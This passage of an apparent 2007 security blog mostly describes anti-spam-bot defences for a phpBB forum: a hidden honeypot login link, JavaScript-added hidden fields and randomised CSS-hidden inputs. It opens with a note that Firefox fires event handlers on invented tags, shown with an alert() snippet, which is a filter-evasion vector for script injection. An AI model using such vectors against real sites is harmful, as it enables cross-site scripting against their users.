The equivalent Internet Explorer version can be found here (it works well... ie does nothing).

I didn't really take the time to think about this, but I'm sure something can come out of it...

Edit: Wisec found that under firefox you can also fire every event on nonexistent tags such as:

<unex ondblclick="alert('TEST')">test</unex >

Wednesday, February 21 2007

Spam bots protection 2: the trap

The previous article on spam bots focused on the generation of the document itself, by adding dynamic content (JavaScript) or random fields... By the way, Jungsonn follows up with a clever technique of the same kind.

Today, I was looking at the logs of a phpBB forum that we have in an association and that gets lots of spam; okay, phpBB is famous and maybe not the most secure, but well... there is some prevention for this (modules such as CAPTCHA) and the webmaster installed lots of them...
I was quickly able to detect the bots manually: they follow more or less the same process, even if they introduce lots of variations, and of course a detection system cannot be time-based because they guard against this.
So we can easily see that it's tricky to detect a bot automatically without machine learning, SVM etc., but that's not my point here.

If I cannot easily prevent them from coming to the website or track them, I can at least manipulate them in some way:
A fake login page which cannot be seen by a user (<a href="login.php?sid=THE SESSION ID" style="display:none">Login</a>; as display:none can easily be detected by the bots, we can disguise it with the JavaScript "expression" evaluation in CSS...), and the fake page adds some information to the cookie/session such as SESSION['BOT'] = 'DETECTED' etc.
We also need a verification script embedded in every page, which would generate a blank page or something like that... Don't forget to also ban the IP address.
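
The trap logic above fits in a few lines. The following Python sketch is only a model of it: the handle_request function, the plain dict used as a session and the returned status codes are assumptions of this example, not code from a real forum.

```python
TRAP_PATH = "/login.php"  # target of the invisible link
banned_ips = set()

def handle_request(path, ip, session):
    """Return the HTTP status that the verification hook would answer with."""
    if path == TRAP_PATH:
        session["BOT"] = "DETECTED"  # only a bot follows the invisible link
        banned_ips.add(ip)
    if session.get("BOT") == "DETECTED" or ip in banned_ips:
        return 403                   # or serve a blank page
    return 200

session = {}
print(handle_request("/index.php", "10.0.0.1", session))  # prints 200
print(handle_request("/login.php", "10.0.0.1", session))  # prints 403
print(handle_request("/index.php", "10.0.0.1", session))  # prints 403
```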

I will try to develop this idea and test it because, for now, I have no proof that it can work properly. Furthermore, it also requires the bots not to support CSS and/or JavaScript.

Wednesday, January 31 2007

How to prevent spammers bot?

There are many ways to prevent spam, from bayesian tests (statistical tests) to the basic captcha... But we all know that picture captchas can be bypassed by OCR, even if it can be quite tough; there are some software and articles about it (example here).
Well, let's talk about 2 other ways:

1. JavaScript version

Assuming that robots do not interpret JavaScript (which is probably true for most of the bots) it would be nice to have a hidden field filled by JavaScript. It's quite simple to make such a script:

var W3CDOM = (document.createElement);
var inputInserted = false;
function addInput() {
	if (!W3CDOM || inputInserted)
		return;
	// create the input form
	var hiddenInput = document.createElement('input');
	hiddenInput.type = "hidden";
	hiddenInput.name = "testBrowser";
	hiddenInput.value = "success";
	//now add the input to the DOM.
	document.forms[0].appendChild(hiddenInput);
	inputInserted = true;
}

Then, you test that the GET/POST('testBrowser') == 'success'; The input looks like that:

<input type="text" name="OneOfMyFields" onclick="addInput()" />

2. Script generated form

The idea is to create a form with one input which has different instances, let's say:

<input class='c1' type="text" name="login_1" value="" />
<input class='c2' type="text" name="login_2" value="" />
<input class='c3' type="text" name="login_3" value="" />

With your script, you choose a 'random' number from 1 to 3 and create the matching CSS style (hide the inputs that were not chosen). The script stores the value of the random number in a cookie/SESSION/JavaScript and checks the submission against this value afterwards.
If an input other than the chosen one is filled in, then this should be an automated thing...
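
Here is a minimal server-side sketch of this second technique, written in Python for illustration. The function names, the dict used as a session and the inline style block are assumptions of the example; it also assumes at least 2 inputs.

```python
import random

def build_form(session, count=3, rng=random):
    """Render `count` login inputs and hide all but one randomly chosen input."""
    chosen = rng.randint(1, count)
    session["login_field"] = chosen  # remembered server-side for the later check
    hidden = ", ".join(".c%d" % i for i in range(1, count + 1) if i != chosen)
    css = "<style>%s { display: none; }</style>" % hidden
    inputs = "\n".join(
        '<input class="c%d" type="text" name="login_%d" value="" />' % (i, i)
        for i in range(1, count + 1))
    return css + "\n" + inputs

def looks_automated(session, post):
    """True if any login input other than the chosen one was filled in."""
    chosen = "login_%d" % session["login_field"]
    return any(value for name, value in post.items()
               if name.startswith("login_") and name != chosen)

session = {}
print(build_form(session))
print(looks_automated(session, {"login_1": "x", "login_2": "x", "login_3": "x"}))  # prints True
```

A bot that fills every field is caught every time, while one that fills a single field at random still passes once in `count` tries.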

These techniques are absolutely not perfect. For the first one, the assumption is quite odd: it's not too hard to build a bot which can handle javascript/css/dom etc. For the second one, 3 inputs are not enough; you need at least 30 for a representative level of trust.

I <3 Bots!